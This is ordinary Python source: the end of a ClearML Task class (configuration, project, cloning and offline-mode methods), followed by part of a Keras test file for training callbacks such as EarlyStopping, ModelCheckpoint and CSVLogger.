response.ok() or not response.response_data: return {} return response.response_data def get_reported_console_output(self, number_of_reports=1): # type: (int) -> Sequence[str] """ Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs. :param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the last (most updated) console output :return: A list of strings, each entry corresponds to one report. """ if Session.check_min_api_version('2.9'): request = events.GetTaskLogRequest( task=self.id, order='asc', navigate_earlier=True, batch_size=number_of_reports) else: request = events.GetTaskLogRequest( task=self.id, order='asc', from_='tail', batch_size=number_of_reports) res = self.send(request) response = res.wait() if not response.ok() or not response.response_data.get('events'): return [] lines = [r.get('msg', '') for r in response.response_data['events']] return lines def get_configuration_object(self, name): # type: (str) -> Optional[str] """ Get the Task's configuration object section as a blob of text Use only for automation (externally), otherwise use `Task.connect_configuration`. :param str name: Configuration section name :return: The Task's configuration as a text blob (unconstrained text string) return None if configuration name is not valid """ return self._get_configuration_text(name) def set_configuration_object(self, name, config_text=None, description=None, config_type=None): # type: (str, Optional[str], Optional[str], Optional[str]) -> None """ Set the Task's configuration object as a blob of text. Use only for automation (externally), otherwise use `Task.connect_configuration`. :param str name: Configuration section name :param config_text: configuration as a blob of text (unconstrained text string) usually the content of a configuration file of a sort :param str description: Configuration section description :param str config_type: Optional configuration format type """ return self._set_configuration( name=name, description=description, config_type=config_type, config_text=config_text) @classmethod def get_projects(cls): # type: () -> (List['projects.Project']) """ Return a list of projects in the system, sorted by last updated time :return: A list of all the projects in the system. Each entry is a `services.projects.Project` object. """ res = cls._send( cls._get_default_session(), projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True) if res and res.response and res.response.projects: return [projects.Project(**p.to_dict()) for p in res.response.projects] return [] @classmethod def get_project_id(cls, project_name): # type: (str) -> Optional[str] """ Return a the project unique id (str). If for than one project match the project_name, return the last updated project If no project matched the requested name, returns None :return: Project unique ID (str), or None if no project was found. """ assert project_name assert isinstance(project_name, str) res = cls._send( cls._get_default_session(), projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)), raise_on_errors=False) if res and res.response and res.response.projects: return [projects.Project(**p.to_dict()).id for p in res.response.projects][0] return None @staticmethod def running_locally(): # type: () -> bool """ Is the task running locally (i.e., ``clearml-agent`` is not executing it) :return: True, if the task is running locally. False, if the task is not running locally. """ return not running_remotely() @classmethod def add_requirements(cls, package_name, package_version=None): # type: (str, Optional[str]) -> () """ Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the installed package version, if found. Example: Task.add_requirements('tensorflow', '2.4.0') :param str package_name: The package name to add to the "Installed Packages" section of the task. :param package_version: The package version requirements. If ``None``, then use the installed version. """ cls._force_requirements[package_name] = package_version def _get_models(self, model_type='output'): # type: (str) -> Sequence[Model] # model_type is either 'output' or 'input' model_type = model_type.lower().strip() assert model_type == 'output' or model_type == 'input' if model_type == 'input': regex = r'((?i)(Using model id: )(\w+)?)' compiled = re.compile(regex) ids = [i[-1] for i in re.findall(compiled, self.comment)] + ( [self.input_model_id] if self.input_model_id else []) # remove duplicates and preserve order ids = list(OrderedDict.fromkeys(ids)) from ...model import Model as TrainsModel in_model = [] for i in ids: m = TrainsModel(model_id=i) # noinspection PyBroadException try: # make sure the model is is valid # noinspection PyProtectedMember m._get_model_data() in_model.append(m) except Exception: pass return in_model else: res = self.send( models.GetAllRequest( task=[self.id], order_by=['created'], only_fields=['id'] ) ) if not res.response.models: return [] ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else []) # remove duplicates and preserve order ids = list(OrderedDict.fromkeys(ids)) from ...model import Model as TrainsModel return [TrainsModel(model_id=i) for i in ids] def _get_default_report_storage_uri(self): # type: () -> str if self._offline_mode: return str(self.get_offline_mode_folder() / 'data') if not self._files_server: self._files_server = Session.get_files_server_host() return self._files_server def _get_status(self): # type: () -> (Optional[str], Optional[str]) if self._offline_mode: return tasks.TaskStatusEnum.created, 'offline' # noinspection PyBroadException try: all_tasks = self.send( tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']), ).response.tasks return all_tasks[0].status, all_tasks[0].status_message except Exception: return None, None def _reload_last_iteration(self): # type: () -> () # noinspection PyBroadException try: all_tasks = self.send( tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']), ).response.tasks self.data.last_iteration = all_tasks[0].last_iteration except Exception: return None def _clear_task(self, system_tags=None, comment=None): # type: (Optional[Sequence[str]], Optional[str]) -> () self._data.script = tasks.Script( binary='', repository='', tag='', branch='', version_num='', entry_point='', working_dir='', requirements={}, diff='', ) self._data.execution = tasks.Execution( artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='') self._data.comment = str(comment) self._storage_uri = None self._data.output.destination = self._storage_uri self._update_requirements('') if Session.check_min_api_version('2.9'): self._set_task_property("system_tags", system_tags) self._edit(system_tags=self._data.system_tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest='', hyperparams=dict(), configuration=dict()) elif Session.check_min_api_version('2.3'): self._set_task_property("system_tags", system_tags) self._edit(system_tags=self._data.system_tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest='') else: self._set_task_property("tags", system_tags) self._edit(tags=self._data.tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest=None) @classmethod def _get_api_server(cls): # type: () -> () return Session.get_api_server_host() def _get_app_server(self): # type: () -> str if not self._app_server: self._app_server = Session.get_app_server_host() return self._app_server def _is_remote_main_task(self): # type: () -> bool """ :return: return True if running remotely and this Task is the registered main task """ return running_remotely() and get_remote_task_id() == self.id def _edit(self, **kwargs): # type: (**Any) -> Any with self._edit_lock: if self._offline_mode: for k, v in kwargs.items(): setattr(self.data, k, v) Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True) with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f: export_data = self.data.to_dict() export_data['project_name'] = self.get_project_name() export_data['offline_folder'] = self.get_offline_mode_folder().as_posix() json.dump(export_data, f, ensure_ascii=True, sort_keys=True) return None # Since we ae using forced update, make sure he task status is valid status = self._data.status if self._data and self._reload_skip_flag else self.data.status if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress): # the exception being name/comment that we can always change. if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags') for k in kwargs.keys()): pass else: raise ValueError('Task object can only be updated if created or in_progress') res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False) return res def _update_requirements(self, requirements): # type: (Union[dict, str]) -> () if not isinstance(requirements, dict): requirements = {'pip': requirements} # protection, Old API might not support it # noinspection PyBroadException try: with self._edit_lock: self.reload() self.data.script.requirements = requirements if self._offline_mode: self._edit(script=self.data.script) else: self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements)) except Exception: pass def _update_script(self, script): # type: (dict) -> () with self._edit_lock: self.reload() self.data.script = script self._edit(script=script) def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None): # type: (str, Optional[str], Optional[str], Optional[str], Optional[Mapping]) -> None """ Set Task configuration text/dict. Multiple configurations are supported. :param str name: Configuration name. :param str description: Configuration section description. :param str config_type: Optional configuration format type (str). :param config_text: model configuration (unconstrained text string). usually the content of a configuration file. If `config_text` is not None, `config_dict` must not be provided. :param config_dict: model configuration parameters dictionary. If `config_dict` is not None, `config_text` must not be provided. """ # make sure we have wither dict or text mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True) if not Session.check_min_api_version('2.9'): raise ValueError("Multiple configurations is not supported with the current 'clearml-server', " "please upgrade to the latest version") if description: description = str(description) # support empty string a_config = config_dict_to_text(config_dict if config_text is None else config_text) with self._edit_lock: self.reload() configuration = self.data.configuration or {} configuration[name] = tasks.ConfigurationItem( name=name, value=a_config, description=description or None, type=config_type or None) self._edit(configuration=configuration) def _get_configuration_text(self, name): # type: (str) -> Optional[str] """ Get Task configuration section as text :param str name: Configuration name. :return: The Task configuration as text (unconstrained text string). return None if configuration name is not valid. """ if not Session.check_min_api_version('2.9'): raise ValueError("Multiple configurations is not supported with the current 'clearml-server', " "please upgrade to the latest version") configuration = self.data.configuration or {} if not configuration.get(name): return None return configuration[name].value def _get_configuration_dict(self, name): # type: (str) -> Optional[dict] """ Get Task configuration section as dictionary :param str name: Configuration name. :return: The Task configuration as dictionary. return None if configuration name is not valid. """ config_text = self._get_configuration_text(name) if not config_text: return None return text_to_config_dict(config_text) def get_offline_mode_folder(self): # type: () -> (Optional[Path]) """ Return the folder where all the task outputs and logs are stored in the offline session. :return: Path object, local folder, later to be used with `report_offline_session()` """ if not self._offline_mode: return None return get_offline_dir(task_id=self.task_id) @classmethod def _clone_task( cls, cloned_task_id, # type: str name=None, # type: Optional[str] comment=None, # type: Optional[str] execution_overrides=None, # type: Optional[dict] tags=None, # type: Optional[Sequence[str]] parent=None, # type: Optional[str] project=None, # type: Optional[str] log=None, # type: Optional[logging.Logger] session=None, # type: Optional[Session] ): # type: (...) -> str """ Clone a task :param str cloned_task_id: Task ID for the task to be cloned :param str name: New for the new task :param str comment: Optional comment for the new task :param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution section, useful for overriding values in the cloned task. :param list tags: Optional updated model tags :param str parent: Optional parent Task ID of the new task. :param str project: Optional project ID of the new task. If None, the new task will inherit the cloned task's project. :param logging.Logger log: Log object used by the infrastructure. :param Session session: Session object used for sending requests to the API :return: The new tasks's ID. """ session = session if session else cls._get_default_session() use_clone_api = Session.check_min_api_version('2.9') if use_clone_api: res = cls._send( session=session, log=log, req=tasks.CloneRequest( task=cloned_task_id, new_task_name=name, new_task_tags=tags, new_task_comment=comment, new_task_parent=parent, new_task_project=project, execution_overrides=execution_overrides, ) ) cloned_task_id = res.response.id return cloned_task_id res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id)) task = res.response.task output_dest = None if task.output: output_dest = task.output.destination execution = task.execution.to_dict() if task.execution else {} execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution), ConfigFactory.from_dict(execution_overrides or {})) # clear all artifacts execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input'] if not hasattr(task, 'system_tags') and not tags and task.tags: tags = [t for t in task.tags if t != cls._development_tag] extra = {} if hasattr(task, 'hyperparams'): extra['hyperparams'] = task.hyperparams if hasattr(task, 'configuration'): extra['configuration'] = task.configuration if getattr(task, 'system_tags', None): extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)] req = tasks.CreateRequest( name=name or task.name, type=task.type, input=task.input if hasattr(task, 'input') else {'view': {}}, tags=tags, comment=comment if comment is not None else task.comment, parent=parent, project=project if project else task.project, output_dest=output_dest, execution=execution.as_plain_ordered_dict(), script=task.script, **extra ) res = cls._send(session=session, log=log, req=req) cloned_task_id = res.response.id if task.script and task.script.requirements: cls._send(session=session, log=log, req=tasks.SetRequirementsRequest( task=cloned_task_id, requirements=task.script.requirements)) return cloned_task_id @classmethod def get_all(cls, session=None, log=None, **kwargs): # type: (Optional[Session], Optional[logging.Logger], **Any) -> Any """ List all the Tasks based on specific projection. :param Session session: The session object used for sending requests to the API. :param logging.Logger log: The Log object. :param kwargs: Keyword args passed to the GetAllRequest (see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`) For example: .. code-block:: bash status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id' :type kwargs: dict :return: The API response. """ session = session if session else cls._get_default_session() req = tasks.GetAllRequest(**kwargs) res = cls._send(session=session, req=req, log=log) return res @classmethod def get_by_name(cls, task_name): # type: (str) -> Task res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name))) task = get_single_result(entity='task', query=task_name, results=res.response.tasks) return cls(task_id=task.id) @classmethod def _get_project_name(cls, project_id): res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False) if not res or not res.response or not res.response.project: return None return res.response.project.name def _get_all_events( self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url") ): # type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]] """ Get a list of all reported events. Warning: Debug only. Do not use outside of testing. :param max_events: The maximum events the function will return. Pass None to return all the reported events. :param batch_size: The maximum number of events retrieved by each internal call performed by this method. :param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending. :param event_type: Event type. Pass None to get all event types. :param unique_selector: If provided, used to select a value from each event, only a unique set of these values will be returned by this method. :return: A list of events from the task. If unique_selector was provided, a set of values selected from events of the task. """ batch_size = max_events or batch_size log_events = self.send(events.GetTaskEventsRequest( task=self.id, order=order, batch_size=batch_size, event_type=event_type, )) returned_count = log_events.response.returned total_events = log_events.response.total scroll = log_events.response.scroll_id if unique_selector: events_list = set(map(unique_selector, log_events.response.events)) else: events_list = log_events.response.events while returned_count < total_events and (max_events is None or len(events_list) < max_events): log_events = self.send(events.GetTaskEventsRequest( task=self.id, order=order, batch_size=batch_size, event_type=event_type, scroll_id=scroll, )) scroll = log_events.response.scroll_id returned_count += log_events.response.returned if unique_selector: events_list.update(log_events.response.events) else: events_list.extend(log_events.response.events) return events_list @property def _edit_lock(self): # type: () -> () # skip the actual lock, this one-time lock will always enter # only used on shutdown process to avoid deadlocks if self.__edit_lock is False: return RLock() if self.__edit_lock: return self.__edit_lock if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2: self.__edit_lock = RLock() elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id): filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id)) # no need to remove previous file lock if we have a dead process, it will automatically release the lock. # # noinspection PyBroadException # try: # os.unlink(filename) # except Exception: # pass # create a new file based lock self.__edit_lock = FileRLock(filename=filename) else: self.__edit_lock = RLock() return self.__edit_lock @_edit_lock.setter def _edit_lock(self, value): # type: (RLock) -> () self.__edit_lock = value @classmethod def __update_master_pid_task(cls, pid=None, task=None): # type: (Optional[int], Union[str, Task]) -> () pid = pid or os.getpid() if not task: PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':') elif isinstance(task, str): PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task) else: # noinspection PyUnresolvedReferences PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id)) # make sure we refresh the edit lock next time we need it, task._edit_lock = None @classmethod def __get_master_id_task_id(cls): # type: () -> Optional[str] master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':') # we could not find a task ID, revert to old stub behaviour if len(master_task_id) < 2 or not master_task_id[1]: return None return master_task_id[1] @classmethod def __is_subprocess(cls): # type: () -> bool # notice this class function is called from Task.ExitHooks, do not rename/move it. is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \ PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid()) return is_subprocess @classmethod def set_offline(cls, offline_mode=False): # type: (bool) -> () """ Set offline mode, where all data and logs are stored into local folder, for later transmission :param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled. :return: """ if not running_remotely(): ENV_OFFLINE_MODE.set(offline_mode) InterfaceBase._offline_mode = bool(offline_mode) Session._offline_mode = bool(offline_mode) @classmethod def is_offline(cls): # type: () -> bool """ Return offline-mode state, If in offline-mode, no communication to the backend is enabled. :return: boolean offline-mode state """ return cls._offline_mode @classmethod def _get_task_status(cls, task_id): # type: (str) -> (Optional[str], Optional[str]) if cls._offline_mode: return tasks.TaskStatusEnum.created, 'offline' # noinspection PyBroadException try: all_tasks = cls._get_default_session().send( tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']), ).response.tasks return all_tasks[0].status, all_tasks[0].status_message except Exception: return None, None
test_callbacks.py
import os import multiprocessing import numpy as np import pytest from numpy.testing import assert_allclose from csv import reader from csv import Sniffer import shutil from keras import optimizers from keras import initializers from keras import callbacks from keras.models import Sequential, Model from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D from keras.layers.pooling import GlobalAveragePooling1D from keras.layers.pooling import GlobalAveragePooling2D from keras.utils.test_utils import get_test_data from keras.utils.test_utils import keras_test from keras import backend as K from keras.utils import np_utils try: from unittest.mock import patch except: from mock import patch input_dim = 2 num_hidden = 4 num_classes = 2 batch_size = 5 train_samples = 20 test_samples = 20 @keras_test def test_TerminateOnNaN(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN()] model = Sequential() initializer = initializers.Constant(value=1e5) for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu', kernel_initializer=initializer)) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') # case 1 fit history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf # case 2 fit_generator def data_generator(): max_batch_index = len(X_train) // batch_size i = 0 while 1: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train), validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf or np.isnan(loss[0]) @keras_test def test_stop_training_csv(tmpdir): np.random.seed(1337) fp = str(tmpdir / 'test.csv') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)] model = Sequential() for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(X_train) // batch_size tot = 0 while 1: if tot > 3 * len(X_train): yield (np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan) else: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 tot += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train) // batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: for x in reader(f): values.append(x) assert 'nan' in values[-1], 'The last epoch was not logged.' os.remove(fp) @keras_test def test_ModelCheckpoint(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'checkpoint.h5') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 2 mode = 'min' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 3 mode = 'max' monitor = 'val_acc' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 4 save_best_only = True cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 5 save_best_only = False period = 2 mode = 'auto' filepath = 'checkpoint.{epoch:02d}.h5' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=4) assert os.path.isfile(filepath.format(epoch=2)) assert os.path.isfile(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not tmpdir.listdir() @keras_test def test_EarlyStopping(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) mode = 'max' monitor = 'val_acc' patience = 0 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) mode = 'auto' monitor = 'val_acc' patience = 2 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) @keras_test def test_EarlyStopping_reuse(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = Sequential(( Dense(1, input_dim=1, activation='relu'), Dense(1, activation='sigmoid'), )) model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) stopper = callbacks.EarlyStopping(monitor='acc', patience=patience) weights = model.get_weights() hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience # This should allow training to go for at least `patience` epochs model.set_weights(weights) hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience @keras_test def test_EarlyStopping_patience(): class DummyModel(object): def __init__(self): self.stop_training = False def get_weights(self): return [] def set_weights(self, weights): pass early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.0860, 0.1096, 0.1040, 0.1019] # Should stop after epoch 3, # as the loss has not improved after patience=2 epochs. epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break assert epochs_trained == 3 @keras_test def test_EarlyStopping_baseline(): class DummyModel(object): def __init__(self): self.stop_training = False def get_weights(self): return [] def set_weights(self, weights): pass def baseline_tester(acc_levels): early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75, patience=2) early_stop.model = DummyModel() epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(acc_levels)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]}) if early_stop.model.stop_training: break return epochs_trained acc_levels = [0.55, 0.76, 0.81, 0.81] baseline_met = baseline_tester(acc_levels) acc_levels = [0.55, 0.74, 0.81, 0.81] baseline_not_met = baseline_tester(acc_levels) # All epochs should run because baseline was met in second epoch assert baseline_met == 4 # Baseline was not met by second epoch and should stop assert baseline_not_met == 2 @keras_test def test_EarlyStopping_final_weights(): class DummyModel(object): def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in the epoch 2 (loss = 0.1000), # so with patience=2 we need to end up at epoch 4 assert early_stop.model.get_weights() == 4 @keras_test def test_EarlyStopping_final_weights_when_restoring_model_weights(): class DummyModel(object): def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2, restore_best_weights=True) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] # The best configuration is in the epoch 2 (loss = 0.1000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in epoch 2 (loss = 0.1000), # and while patience = 2, we're restoring the best weights, # so we end up at the epoch with the best weights, i.e. epoch 2 assert early_stop.model.get_weights() == 2 @keras_test def test_LearningRateScheduler(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon() @keras_test def test_ReduceLROnPlateau(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, min_delta=10, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert_allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon()) model = make_model() cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, min_delta=0, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert_allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon()) @keras_test def test_ReduceLROnPlateau_patience(): class DummyOptimizer(object): def __init__(self): self.lr = K.variable(1.0) class DummyModel(object): def __init__(self): self.optimizer = DummyOptimizer() reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss', patience=2) reduce_on_plateau.model = DummyModel() losses = [0.0860, 0.1096, 0.1040] lrs = [] for epoch in range(len(losses)): reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr)) # The learning rates should be 1.0 except the last one assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0 @keras_test def test_ReduceLROnPlateau_backwards_compatibility(): import warnings with warnings.catch_warnings(record=True) as ws: reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13) # Check if warnings are disabled if os.environ.get("PYTHONWARNINGS") != "ignore": assert "`epsilon` argument is deprecated" in str(ws[0].message) assert not hasattr(reduce_on_plateau, 'epsilon') assert hasattr(reduce_on_plateau, 'min_delta') assert reduce_on_plateau.min_delta == 1e-13 @keras_test def test_CSVLogger(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'log.tsv') sep = '\t' (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) with open(filepath) as csvfile: dialect = Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) # case 3, reuse of CSVLogger object model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, 